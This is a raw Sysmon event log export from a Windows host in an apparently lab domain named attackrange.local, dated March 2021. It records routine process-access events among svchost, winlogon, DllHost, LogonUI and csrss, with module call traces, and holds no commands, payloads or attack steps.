12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.669{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9700-00000000AE01}4372C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.669{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64C3-6064-9700-00000000AE01}4372C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.669{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9700-00000000AE01}4372C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.622{266CAFBE-64C1-6064-9300-00000000AE01}872NT AUTHORITY\SYSTEMC:\Windows\system32\LogonUI.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\1033\StructuredQuerySchema.binMD5=E871053170AD09568882637D049295DC,SHA256=CEA9EABB0B46AC602CDC3FB6FE6215981F2D7C0C6A5C5023CE72860232DBE12B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.591{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.591{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.591{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.591{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+2de4|c:\windows\system32\lsm.dll+57af|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.591{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2dce|c:\windows\system32\lsm.dll+57af|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.591{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+5f9d|c:\windows\system32\lsm.dll+57a4|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+2f9b|c:\windows\system32\lsm.dll+5727|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2f4d|c:\windows\system32\lsm.dll+5727|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+5f9d|c:\windows\system32\lsm.dll+5718|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+56c4|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 